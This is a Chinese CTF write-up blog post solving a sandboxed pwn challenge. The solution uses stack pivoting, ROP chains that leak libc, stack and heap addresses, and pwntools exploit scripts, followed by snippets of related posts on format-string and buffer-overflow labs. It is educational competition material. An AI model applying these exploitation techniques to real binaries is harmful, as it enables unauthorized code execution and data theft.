2024-Beichen-CTF-WP
今年暑假参加了信大举办的北辰计划夏令营,其中最后一天举行了一次CTF比赛,第一批的题目比较难,当时没做出来,现在重新做一下,在此记录。
PWN
PWN1
题目描述
- 首先读取输入,判断输入与加密后的字符串,成功才能进入漏洞函数:
直接动态调试可以得到输入应为I_can_find_the_right_path\n,然后进入存在漏洞函数; - 漏洞函数会首先打开flag文件,将flag读入到堆上,并且关闭了flag文件描述符,然后使用seccomp开启沙箱保护,只允许read和write,exit(这里有点问题,好像不能直接用syscall的gadget,会直接报错
bad system call,知道的师傅可以解释一下QWQ)。
然后漏洞函数读取0x40字节,可以溢出0x10字节。
思路
首先可以通过构造fake stack来写入更大长度的rop链,分为两步,第一步覆盖rbp为想要写入的伪栈地址,然后重新返回到vuln_addr+8(如图,要跳过
push rbp,mov rbp,rsp),第二步向伪栈写入内容,然后leave ret即可实现栈迁移。
脚本如下:
1
2
3
4
5
6
7# step1: construct fake rbp
payload = flat(b'a'*0x30, bss_addr, vuln_addr+8)
p.sendafter("===welcome===\n", payload)
# step2: input ROP to leak libc
payload = flat(pop_rdi, puts_got, puts_plt, vuln_addr)
payload = flat(payload, b'a'*(0x30-len(payload)), bss_addr-0x30-0x8, leave_ret)然后使用puts函数打印puts got表地址,泄漏libc
1
2
3
4
5
6
7
8
9# step2: input ROP to leak libc
payload = flat(pop_rdi, puts_got, puts_plt, vuln_addr)
payload = flat(payload, b'a'*(0x30-len(payload)), bss_addr-0x30-0x8, leave_ret)
p.send(payload)
puts_addr = u64(p.recv(6).ljust(8, b'\x00'))
info(f"puts_addr: {hex(puts_addr)}")
libc_addr = puts_addr - libc.sym['puts']
info(f"libc_addr: {hex(libc_addr)}")通过libc上environ符号打印出其所在栈地址
脚本如下:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32# step3: leak environ_addr
pop_rsi = 0x000000000002be51+libc_addr
pop_rdx_r12 = 0x000000000011f497+libc_addr
read_addr = libc_addr+libc.sym['read']
write_addr = libc_addr+libc.sym['write']
syscall = libc_addr+0x0000000000029db4
pop_rax = 0x0000000000045eb0+libc_addr
# mp_addr = libc_addr+libc.sym["mp]+96+1
info(f"read_addr: {hex(read_addr)}")
info(f"write_addr: {hex(write_addr)}")
# info(f"mp_addr: ")
flag_addr = 0x404600
payload = flat(p64(bss_addr-0x100)*6, bss_addr, vuln_addr+8)
p.send(payload)
payload = flat(pop_rdi, 0, pop_rsi, flag_addr, pop_rdx_r12, 0x100, bss_addr+0x30, vuln_addr+8)
p.send(payload)
payload = flat(0, pop_rdi, 0, read_addr, vuln_addr+8, 0, bss_addr-0x30-0x8, leave_ret)
p.send(payload)
environ_addr = 0x28f2d0+libc_addr
payload = flat(pop_rdi, 1, pop_rsi, environ_addr, pop_rdx_r12, 0x6, 0, write_addr, vuln_addr)
payload = payload.ljust(0x100, b'\x00')
p.send(payload)
payload = flat(b'a'*0x30, flag_addr-0x8, leave_ret)
p.send(payload)
p.recvline()
stack_addr = u64(p.recv(6).ljust(8, b'\x00'))
info(f"stack_addr: {hex(stack_addr)}")然后根据偏移可以获取到栈上存储的堆地址,从而获取到存放flag的堆的地址
脚本如下,这里假定堆地址只有3字节,可能需要多试几次才能出来:
1
2
3
4
5
6
7
8
9
10# step4: leak heap_addr
heap_addr = stack_addr-0x130
payload = flat(b'c'*0x30, bss_addr+0x200, vuln_addr+8)
p.send(payload)
payload = flat(pop_rdi, heap_addr, puts_plt, vuln_addr, b'c'*0x10, bss_addr+0x200-0x30-0x8, leave_ret)
p.send(payload)
heap_addr = u64(p.recv(3).ljust(8, b'\x00'))+0x30
info(f"heap_addr: {hex(heap_addr)}")puts函数打印flag地址即可
1
2
3
4
5
6# step5: print flag
payload = flat(b'd'*0x30, bss_addr+0x200, vuln_addr+8)
p.send(payload)
payload = flat(pop_rdi, heap_addr, puts_addr, vuln_addr, b'd'*0x10, bss_addr+0x200-0x30-0x8, leave_ret)
p.send(payload)
完整exp如下:
1 | from pwn import * |
本博客所有文章除特别声明外,均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来源 Small Utopia!
相关推荐
.jpg)
2023-10-23
BUUCTF 第五空间PWN5
考点 格式化字符串漏洞 解题过程 首先使用checksec工具查看基本信息 为32位,canary,dep防护 使用ida工具进行静态分析。 main main函数主要代码如上图所示,可以看见print((int)v7)存在格式化字符串输出漏洞,因此可以考虑进行利用(注:由于输入read限制了输入长度,导致无法通过泄漏canary方法来进行栈溢出攻击。) 构造python脚本如下,主要思路为修改printf的got表plt地址为要执行的代码地址(若开启full relro则无法使用),然后再代码执行到下一次调用printf函数时会转去执行目标代码。获得shell。 1234567891011121314151617181920from pwn import *context(arch="i386", log_level="debug")# p = process("./pwn")p = remote("node4.buuoj.cn", 29338)elf =...
.jpg)
2023-10-25
【SEED Lab2.0】缓冲区溢出实验报告
stack_overflow(setuid)环境配置配置环境,关闭ASLR地址随机化,将/bin/sh链接到/bin/zsh(/bin/dash以及/bin/bash都实现了一种安全对策, 防止自己在Set-UID进程中执行。 基本上,如果它们检测到它们是在一个Set-UID进程中执行的, 它们会立即将有效的用户ID更改为该进程的真实用户ID, 基本上会放弃特权 ) 123❯ sudo sysctl -w kernel.randomize_va_space=0 kernel.randomize_va_space = 0❯ sudo ln -sf /bin/zsh /bin/sh Task1: 熟悉shellcodeshellcode C代码实现: 12345678#include <stddef.h>void main(){ char *name[2]; name[0] = "/bin/sh"; name[1] = NULL; ...
.jpg)
2023-11-10
get_started_3dsctf_2016 WriteUp
考点 对栈溢出函数带参数的溢出理解 解题内容 使用checksec工具查看基本信息: 1234567❯ ~/.local/bin/checksec ./get_started_3dsctf_2016[*] '/home/bronya/Documents/ctf/pwn/get_started_3dsctf_2016/get_started_3dsctf_2016' Arch: i386-32-little RELRO: Partial RELRO Stack: No canary found NX: NX enabled PIE: No PIE...
.jpg)
2023-11-20
【SEED Lab2.0】Return_to_Libc实验报告
Task1:Finding out the Addresses of libc Functions 获取system函数和exit函数地址 gdb批处理命令,新建文件peda-session-retlib.txt,进行批处理操作 Task2:Putting the shell string in the memory 编写getprt.c来获取环境变量地址 getprt.c: 12345678#include<stdlib.h>#include<stdio.h>void main(){char* shell = getenv("MYSHELL");if (shell) printf("%x\n", (unsigned int)shell);} 设置/bin/sh的环境变量,获得地址: 将代码加入到retlib.c中,获取到地址,可以发现地址与getprt的地址相同。(如果开启aslr或者两文件名长度不同则会不同) Task 3: Launching the...
.jpg)
2023-12-11
【SeedLab】格式化字符串实验报告
1 Overviewprintf函数用于根据指定格式打印出字符串,第一个参数诶格式化字符串format string,格式化字符串中使用了%来作为占位符。如果不使用%占位符而是直接将变量放入格式化字符串,则存在格式化字符串漏洞,可能被恶意利用。 2 Environment Setup2.1 Turning of Countermeasure关闭ASLR 12❯ sudo sysctl -w kernel.randomize_va_space=0kernel.randomize_va_space = 0 2.2 The Vulnerable Program漏洞程序如下 format.c:myprintf存在漏洞printf(msg); 1234567891011121314151617181920212223242526void myprintf(char *msg){#if __x86_64__ unsigned long int *framep; // Save the rbp value into framep asm("movq...
.jpg)
2024-10-22
2024 ZJUCTF WriteUp
本次校赛题目质量不错,难度设置比较合适,属于是看到感觉可以试一试的程度。其中*A口算很有趣!强烈推荐!!! MISC小A口算该题目会随机生成20以内的数字比较,可以构造脚本在1分钟内刷够足够分数,从而获取flag exp 123456789101112131415161718192021222324252627282930from pwn import *context(arch='amd64', log_level='debug')# p = process('./arithmetic')p = remote('127.0.0.1', 38981)p.recvuntil("Input your choice:")p.sendline('1')p.recvuntil('Try your best to answer questions as much as possible!\n')for i in range(150): ...
评论